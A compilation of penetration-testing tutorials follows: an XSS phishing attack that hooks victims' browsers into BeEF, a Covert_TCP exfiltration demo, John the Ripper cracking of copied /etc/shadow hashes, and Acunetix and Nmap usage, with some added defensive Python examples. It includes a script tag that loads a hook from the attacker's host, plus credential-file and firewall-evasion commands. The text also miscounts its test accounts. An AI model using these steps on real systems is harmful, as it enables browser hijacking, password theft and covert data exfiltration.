Tools

Overview

This exploit tutorial will give a brief overview of Cross-Site Scripting (XSS) and how to leverage it to control a victim’s browser. XSS is a very common web application vulnerability that many dismiss as low risk because they don’t understand what’s possible. It can be used in a very subtle way to pivot into a company’s internal network by abusing a victim’s hooked browser.
Normally XSS targets a victim’s browser through the web application. So when a user visits the page, the attacker gets to run their code in the user’s browser.

Cross-Site Scripting Using BeEF

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

The Attack Process

This attack has an Attacker and a Victim.

The Attacker will craft a phishing email to exploit an internal cross-site scripting vulnerability.

Once it is exploited, the Attacker can fully compromise the victim’s machine and carry out commands against it.

This is to prove that Cross-Site Scripting is a major issue not only for the applications themselves but for the users that are using them.

Step 1

Find a web application that is vulnerable to Cross-Site Scripting.

For example the vulnerable parameters are:

FirstName

Last Name

Step 2

A phishing email is crafted and sent to the victim. Within this email the “Sign up Here” link contains a crafted URL, which can be seen at the bottom of the image below and more clearly in the image further down.
This URL takes advantage of the Cross-Site Scripting vulnerability.

This will hook the victim’s browser from their machine back to the IP of the attacker’s machine, which is 10.10.10.99 on port 3000.

Step 3

The victim receives the email and clicks the link; the connection is now made from the victim’s machine back to the attacker’s without the victim knowing.
The victim’s browser is now hooked to the IP of the attacker’s machine, which is 10.10.10.99 on port 3000.

Once the attacker has made this connection by exploiting the Cross-Site Scripting vulnerability through a phishing attack, BeEF allows the attacker to send commands to the victim.

Attacker’s Machine

As we can see, the IP address of the attacker’s machine is 10.10.10.99.

Victim’s Machine

As we can see, the IP address of the victim’s machine is 10.10.10.97.

The image below shows the victim’s machine on 10.10.10.97 now connected to the BeEF framework running on the attacker’s machine, 10.10.10.99.
Once the BeEF hook is loaded in the browser you can check your BeEF controller to control the victim’s browser:
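The following is an added example, not code from the tutorial or from BeEF: a minimal Python rendering of the sign-up page that reflects the two vulnerable parameters, first without and then with output encoding, showing why the crafted link works against one and not the other. The parameter names (FirstName, LastName) and the page layout are assumptions; the hook address is the attacker machine and port from the tutorial.

```python
import html
from urllib.parse import parse_qs, urlencode

# Added example (not code from the tutorial or from BeEF). The hook tag points
# at the attacker machine and port used above; the query string is constructed.
HOOK_TAG = '<script src="http://10.10.10.99:3000/hook.js"></script>'
SAMPLE_QUERY = urlencode({"FirstName": HOOK_TAG, "LastName": "Smith"})  # constructed


def _params(query: str):
    """Pull the two sign-up fields out of a query string (names are assumed)."""
    p = parse_qs(query)
    return p.get("FirstName", [""])[0], p.get("LastName", [""])[0]


def render_vulnerable(query: str) -> str:
    """Reflects user input straight into the HTML: the browser runs the tag."""
    first, last = _params(query)
    return f"<p>Welcome {first} {last}</p>"


def render_hardened(query: str) -> str:
    """HTML-entity-encodes both values, so < and " become &lt; and &quot; and
    the payload is displayed as text rather than executed. A
    Content-Security-Policy header such as script-src 'self' is the usual
    second layer: it stops the browser loading hook.js from another origin
    even if an encoding bug slips through somewhere else."""
    first, last = _params(query)
    return f"<p>Welcome {html.escape(first)} {html.escape(last)}</p>"


def contains_script_tag(page: str) -> bool:
    """Crude response check: is there an un-encoded <script ...> in the page?"""
    return "<script" in page.lower()
```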

This post tries to outline the concept of a covert channel by carrying out a simple demo.

What is a Covert Channel?

A covert channel is described as: “any communication channel that can be exploited by a process to transfer information in a manner that violates the system’s security policy.” Essentially, it is a method of communication that is not part of the actual computer system design, but can be used to transfer information to users or system processes that normally would not be allowed access to that information.

“Communication path not intended as such by system’s designers”

In the case of TCP/IP, there are a number of methods available whereby covert channels can be established and data can be surreptitiously passed between hosts.

Even if an attacker has gained access, infected the system and covered their tracks, they still need to communicate out.

Covert_TCP 1.0 – Covert Channel File Transfer for Linux

Written by Craig H. Rowland (crowland@psionic.com)

Covert_TCP uses spare space in the TCP or IP header. It is a program an attacker can use to send a file through a firewall one byte at a time by hiding the data in the IP header.

‘This program manipulates the TCP/IP header to transfer a file one byte at a time to a destination host. This program can act as a server and a client and can be used to conceal transmission of data inside the IP header. This is useful for bypassing firewalls from the inside, and for exporting data with innocuous looking packets that contain no data for sniffers to analyze. In other words, spy stuff.’

Demo

Open 3 terminals, the sender, the receiver and the listener.

Terminal 1

In terminal 1 create a send directory within /tmp and then a file called send.txt.

cd /tmp

mkdir send

cd send

echo "Hello" > send.txt

Terminal 2

In another terminal create a receive directory within /tmp.

cd /tmp

mkdir receive

cd receive

Terminal 2

Within the receive directory (cd /tmp/receive) run the following command:

It directs the listener to wait for the incoming TCP packets from source port 9999 going to destination port 8888.
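Added example (not part of the post or of Covert_TCP): a detection check a defender could run over a capture summary to spot the demo’s channel from the outside. It assumes the file byte is carried in the IP identification field with the other byte zero; the sample packets and addresses are constructed.

```python
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Added example, not from the post or from Covert_TCP. A capture summary
# (src_ip, src_port, dst_ip, dst_port, ip_id) is grouped into flows, and a
# flow whose IP identification values all decode to printable ASCII is flagged.
Packet = Tuple[str, int, str, int, int]

# Constructed sample: the demo's 9999 -> 8888 flow carrying "Hello\n" one byte
# per packet, plus ordinary web traffic whose IP IDs come from a counter.
# Addresses are documentation-range placeholders, not from the post.
SAMPLE_PACKETS: List[Packet] = (
    [("192.0.2.10", 9999, "192.0.2.20", 8888, ord(c)) for c in "Hello\n"]
    + [("192.0.2.30", 51234, "192.0.2.40", 80, 40001 + i) for i in range(6)]
)


def ascii_in_ipid(ip_id: int) -> Optional[str]:
    """Return the printable byte hidden in a 16-bit IP ID, else None.
    Assumption: one byte of the file sits in the ID field and the other byte
    is zero; which byte is used depends on the sender's byte order, so both
    positions are accepted. Tab, LF and CR count as printable for text files."""
    hi, lo = ip_id >> 8, ip_id & 0xFF
    for byte, other in ((lo, hi), (hi, lo)):
        if other == 0 and (32 <= byte < 127 or byte in (9, 10, 13)):
            return chr(byte)
    return None


def find_ipid_channels(packets: List[Packet], min_packets: int = 4) -> Dict[tuple, str]:
    """Map each suspicious flow to the text its IP IDs spell out.
    Every packet in the flow must carry a printable byte, and the flow must be
    long enough to rule out a counter that merely passed through the ASCII
    range; corroborate hits with other signs (SYN-only packets, no payload)."""
    flows: Dict[tuple, List[int]] = defaultdict(list)
    for src, sport, dst, dport, ip_id in packets:
        flows[(src, sport, dst, dport)].append(ip_id)
    hits: Dict[tuple, str] = {}
    for flow, ids in flows.items():
        chars = [ascii_in_ipid(i) for i in ids]
        if len(ids) >= min_packets and all(c is not None for c in chars):
            hits[flow] = "".join(chars)
    return hits
```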

With John the Ripper you provide the encrypted password files. We will combine the passwd file and the shadow file into one single file and direct John the Ripper to that file.

The passwd file stores account information while the shadow file contains the encrypted (hashed) passwords.

It’s important to remember to clear the john.pot file after each run of John the Ripper against a file; otherwise you will get the results of the previous test.

In the tutorial two test accounts are created, called ‘Ronan’ and ‘Tester’, and both are given a password.

useradd ronan -s /sbin/nologin

passwd ronan

useradd gary -s /sbin/nologin

passwd gary

useradd brian -s /sbin/nologin

passwd brian

Once the accounts are created we check that the shadow password file exists (an ‘x’ in the password field of each passwd entry shows that the hashes are kept in /etc/shadow).

cat /etc/passwd

It does, so we can now copy the shadow and passwd files to a tmp directory.

cp /etc/passwd /tmp/passwd_copy
cp /etc/shadow /tmp/shadow_copy

Now it’s time to start up John the Ripper and use the unshadow script to obtain the password file.

cd /home/tools/john-1.7.2/run

./unshadow /tmp/passwd_copy /tmp/shadow_copy > /tmp/combined

To view the newly created file use the less command.

less /tmp/combined

To view the password.lst wordlist within John the Ripper that we are going to use, we use the less command once again.

less /home/tools/john-1.7.2/run/password.lst

Now, to crack the hashes, we run John the Ripper against our combined passwd and shadow file.

/home/tools/john-1.7.2/run/john /tmp/combined

As you can see from the results above, it took no time to crack the passwords for our test accounts. The final step after cracking is complete is to remove the test accounts and shred the created files and the john.pot file.
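What the unshadow step produces, as an added example written in Python (not John’s own code): the sample passwd and shadow files are constructed for the three test accounts and the hash strings are placeholders.

```python
from typing import Dict, List

# Added example, not John the Ripper's own code. Constructed sample files for
# the three test accounts; the hash strings are placeholders, not real hashes.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
ronan:x:1001:1001::/home/ronan:/sbin/nologin
gary:x:1002:1002::/home/gary:/sbin/nologin
brian:x:1003:1003::/home/brian:/sbin/nologin
"""
SAMPLE_SHADOW = """\
root:!:19000:0:99999:7:::
ronan:$6$constructed$PLACEHOLDERHASHronan:19000:0:99999:7:::
gary:$6$constructed$PLACEHOLDERHASHgary:19000:0:99999:7:::
brian:$6$constructed$PLACEHOLDERHASHbrian:19000:0:99999:7:::
"""


def unshadow(passwd_text: str, shadow_text: str) -> str:
    """Merge passwd and shadow the way John's unshadow does: the 'x'
    placeholder in passwd's second field is replaced by the hash field from
    the matching shadow line. Accounts without a shadow entry keep their 'x'."""
    hashes: Dict[str, str] = {}
    for line in shadow_text.splitlines():
        if line.count(":") >= 1:
            user, hash_field = line.split(":")[:2]
            hashes[user] = hash_field
    merged: List[str] = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip blank or malformed lines
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return "\n".join(merged) + "\n"


def crackable_accounts(combined: str) -> List[str]:
    """Accounts John will actually spend time on: a real hash, not a locked
    (! or *) or shadow-only (x) field. Handy for confirming the merge worked
    before starting a long crack."""
    users: List[str] = []
    for line in combined.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[1] not in ("x", "") and fields[1][0] not in "!*":
            users.append(fields[0])
    return users
```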

From my experience with vulnerability scanners I would rate Acunetix as the best and my favourite, followed by AppScan Standard and then AppScan Enterprise.

Acunetix has a lot more functionality, which allows me to do more. Its customer support is very quick in responding and it is also the cheapest licence out of the 3, but my opinion is only based on performance. (And no, I am not a sales person for Acunetix!!)

Basic Acunetix Scan

It is also possible to select specific files once the crawl is complete, in case some are out of scope.

Fill in Target Information > Next

If the application contains a login mechanism create a new Login Sequence

Verify URL > Next

Enter the Login Credentials > Next

Verify Login was successful > Next

Select any Links that are out of scope or restricted > Next

Verify Login Sequence > Finish

Add any recommendations that are needed; if none are relevant simply ignore > Finish

The scan will then commence.

Scan Results

Once the scan has completed the Scan Results will appear like so. It outlines each issue by severity: High, Medium, Low or Informational.

Scanning Profiles

Acunetix Web Vulnerability Scanner ( WVS ) offers you the ability to choose specific types of attacks to run against a site.

Navigate to the Configuration > Scanning Profiles.

Click the “Create a new profile” button next to the Profile drop down menu and enter a name for the new scanning profile.

Make sure that the scanning profile is selected in the Profile drop down menu and then configure the desired type of attack for the website.

Click “Save” next to the “Create a new profile” button to save the changes to the selected scanning profile.

Site Crawl

The Site Crawler analyses a target website and builds the site structure using the information collected, including the site’s directories and files / objects.

Specify the desired URL and Login Sequence if one is in place. Once the crawl is complete the Results will be displayed as below:

Save the Scan

Crawler configuration settings can be modified by navigating to ‘Configuration > Scan Settings > Crawling Options’. The following Site Crawler options are available:

Target Finder

The Target Finder tool in Acunetix WVS is a port scanner which can be used to discover running web servers on a given IP or within a specified range of IPs.

To start a scan enter a single IP or a range of IPs to be scanned, e.g. 192.168.0.1-100. If the web servers to be scanned are listening on non-default ports add the port numbers to the ‘List of Ports’ entry field.

Discovered web servers are displayed in real time, as soon as they are found. The server type, hostname and server banner are also retrieved. HTTPS web servers are identified by a padlock icon.

Ping the URL to gain the IP.

HTTP Sniffer

It is possible to manually crawl your website with Acunetix WVS using a web browser. Using the resultant — and manually crawled — links, it is then possible to build a website structure that will be targeted during the security scan. This is useful for scanning specific web applications that cannot be automatically crawled due to some strange coding ambiguities.

Configure the proxy Server for the desired browser (IE) as follows:

Click Start

Open the Website in the IE Browser and the HTTP Sniffer and manually move through the Site and the Sniffer will capture all the Requests and Responses.

When finished Hit Stop

It is possible to save the proxy log.

Select the location

Once saved Import Log to the Crawler.

In the Site Crawler node, click the ‘Build Structure from HTTP Sniffer log’ button (highlighted in the above screen shot) to import the captured data into the Site Crawler.

It is also possible to import HTTP Sniffer logs into an already existing scan, or to import multiple HTTP Sniffer logs into the same crawl. To do so, simply tick the option “Merge the log(s) with the currently opened crawl results” in the HTTP Sniffer Log import window, as highlighted below.

Once the Proxy Log has been imported Select the Host > OK

Select Start and the Results will be listed as below

HTTP Fuzzer

The HTTP Fuzzer enables you to launch a series of sophisticated fuzzing tests to audit the web application’s handling of invalid and unexpected random data. The HTTP Fuzzer also allows you to easily create input rules for further testing in Acunetix Web Vulnerability Scanner.

To create a Fuzzer filter, click on the ‘Fuzzer Filters’ button in the toolbar to open the filters dialog. To use a predefined filter template, select the rule template from the dropdown list; otherwise custom filters can be created by defining the following parameters:

Rule description – A name to describe the rule

Rule Type – Select if the rule will be used to Include or Exclude the result returned because of the filter, or if it has to be logged in the ‘Activity Window’

Apply To – Indicate where to search for the matching expression, if in the HTTP response headers, body or status code

Regular expression – The regular expression or text which will be searched to match the rule.

Authentication Tester

From the Tools Explorer, select the ‘Authentication Tester’ node and specify the target URL in the ‘Target URL to test’ edit box.

Select ‘HTML form based’ as the authentication method to be used for the attack and click on ‘Select user/password form fields to use’.

Indicate the form field that represents the username, by clicking on the field and clicking on ‘Username’ button. You have to also indicate the form field that represents the Password by clicking on the field, and clicking on the ‘Password’ button at the bottom of the window.

Acunetix must be instructed what constitutes a failed login page so the application realizes the appropriate behaviour upon successful login. Using a web browser, attempt to log in to the page to generate a login error and note down the text that indicates a login failure. Set ‘Logon has failed if’ to ‘Result contains’ and copy the text that indicates a login failure in the input text box. Regular expressions can also be specified by choosing ‘Result matches regular expression’. Click ‘Start’ to launch the dictionary attack against the web form.

Export Results

Acunetix has the capability to export results as AVDL, XML and in a format for the Imperva WAF.

Reporting

Acunetix Web Vulnerability Scanner Reporter is a standalone application that allows you to generate reports for the security scans performed using Acunetix Web Vulnerability Scanner. The Reporter can be launched after completing a scan, or from the Acunetix Web Vulnerability Scanner program group, and can be used to generate various types of reports including developer reports, executive reports, compliance standard reports or a report that compares the results of two scans.

Each type of report also contains its own Report Wizard to help.

Hit Generate Report

Click ‘Yes’ to import the scan into the database.

Saving a Report automatically saves as a .pre file that can only be opened within Acunetix.

Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan single hosts and large networks.

Zenmap is the official Nmap Security Scanner GUI that aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.

Nmap is a very powerful utility that can be used to:

Detect the live host on the network (host discovery)

Detect the open ports on the host (port discovery or enumeration)

Detect the software and the version to the respective port (service discovery)

Detect the operating system, hardware address, and the software version

Detect the vulnerability and security holes (Nmap scripts)

It is available for both the command line interface and the graphical user interface. Once the exe or ZIP file is downloaded from http://nmap.org/download.html there is an option during installation to install Nmap with the GUI or as the command line interface only.

Simply deselect GUI if you wish for the command line interface, which is recommended as you are actually writing the commands yourself.

If you are a beginner then the GUI is a great place to start as it helps a lot with writing the desired commands for you as you can simply select what you wish it to do.

Once the command line version is downloaded and installed, open up Cmd and navigate to the Nmap folder as shown below. This is where all the commands will then be carried out.

Nmap Help

nmap --help

Lists all the possible commands to help with the following;

TARGET SPECIFICATION

HOST DISCOVERY

SCAN TECHNIQUES

PORT SPECIFICATION AND SCAN ORDER

SERVICE/VERSION DETECTION

SCRIPT SCAN

OS DETECTION

TIMING AND PERFORMANCE

FIREWALL/IDS EVASION AND SPOOFING

OUTPUT

MISC

EXAMPLES

Export to File

--help is just an example; the redirect can be used for any scan.

nmap --help > C:\nmap.txt

Target address URL or IP Address.

nmap Target

Results will outline the following:

Scan a number of specific ports

nmap -p80,21,23 Target

Multiple Targets

nmap -O Target1 Target2

Enable OS and version detection, script scanning, and traceroute; -T4 for faster execution

nmap -A -T4 Target

Find if host/network is protected by a firewall

nmap -sA Target

Scan a host when protected by the firewall

nmap -PN Target

Scan a range of IP address using a wildcard

nmap 192.168.1.*

Entire subnet

nmap 192.168.1.0/24

Exclude hosts from a scan

nmap 192.168.1.0/24 --exclude 192.168.1.5

nmap 192.168.1.0/24 --exclude 192.168.1.5,192.168.1.254

Some Examples of Scans

-sS TCP SYN scan

Known as half-open scanning because this technique allows Nmap to get information from the remote host without completing the TCP handshake: Nmap sends SYN packets to the destination but does not create any sessions. As a result, the target does not create an application-level log of the interaction because no session was established, which is the advantage of the TCP SYN scan (a firewall or IDS in the path can still see and log the SYN packets).

nmap -sS Target

-sT (TCP connect scan)

This is the default TCP scan type when SYN scan is not an option.

Instead of writing raw packets as most other scan types do, Nmap asks the underlying operating system to establish a connection with the target machine and port by issuing the connect system call. Rather than read raw packet responses off the wire, Nmap uses this API to obtain status information on each connection attempt.

nmap -sT Target

-sU (UDP scans)

Sends a UDP packet to every targeted port; if a service responds with a UDP packet, that proves the port is open. Common UDP ports include 53 (DNS) and 161 (SNMP). Ways to speed up UDP scans include scanning more hosts in parallel, doing a quick scan of just the popular ports first, scanning from behind the firewall, and using --host-timeout to skip slow hosts.

nmap -sU Target

-sY (SCTP INIT scan)

SCTP is an alternative to the TCP and UDP protocols, combining most characteristics of TCP and UDP and adding new features like multi-homing and multi-streaming.

nmap -sY Target

-sA (TCP ACK scan)

Used to map out firewall rulesets, determining whether they are stateful or not and which ports are filtered.

nmap -sA Target

-sO (IP protocol scan)

Allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) are supported by target machines.

nmap -sO Target

Zenmap GUI Interface

Zenmap allows interactive creation of Nmap command lines using a point-and-click approach.

Running a scan is as simple as typing the target in the “Target” field, selecting the “Intense scan” profile, and clicking the “Scan” button.

Once the Target and the Profile is selected the Command text-area will outline the Nmap command that is about to be run. This command could also be copied out and used in the Nmap command line interface.

It is possible to use the profile editor as an Nmap command editor. Select “New Profile or Command” from the “Profile” menu or use the Ctrl+P keyboard shortcut. The profile editor will appear, displaying whatever command was shown in the main window.

Within the Scripting tab it is possible to scroll the list on the left to see all the scripts that are installed in script.db. Scripts can be selected or deselected individually by clicking the check-box next to the script name.

To save the profile, first go to the “Profile” tab and give the profile a name. Then click “Save Changes” to save the new profile.

The newly created Profile will then be saved and can then be selected as a scan option in future.

Conclusion

Nmap is a must-have tool for network security experts. It supports many advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. It can scan huge networks containing hundreds of thousands of machines and, most importantly, it offers both the traditional command line and graphical (GUI) versions.

An Analysis of Automated Web Application Scanning Suites

This document is an analysis of the performance of five common web application scanners, which were put up against three different types of web applications. The document provides an evaluation of the web application scanner suites from installation to the completion of the scan, and rates the suites on multiple criteria.

Overall Details Regarding Each Product

Details show that overall the product AppScan is the most costly with Burp Proxy being the cheapest.

AppScan

Acunetix

Burp

Rapid7 NEXPOSE

NTO Spider

Overall Conclusion

Ongoing cyclical web application vulnerability assessments are a critical part of the software development lifecycle (SDLC) for any organization. The harried release cycles of web applications and the scarce availability of skilled security engineers to conduct thorough manual assessments make the market for automated web application vulnerability scanner suites one that will continue to grow. As more products come to market, and more exploitable vulnerabilities are identified, the choices will continue to grow. The end consumer will almost always be faced with picking a product that meets their strictest requirement, the budget. In terms of overall value, it is the conclusion of the researchers conducting the HackMiami 2013 Hackers Conference PwnOff that Portswigger BURP and Rapid7 Nexpose/MetasploitPro currently provide the most value to the independent security consultant in terms of discovered vulnerabilities, ease of use, licensing flexibility, and range of functionality.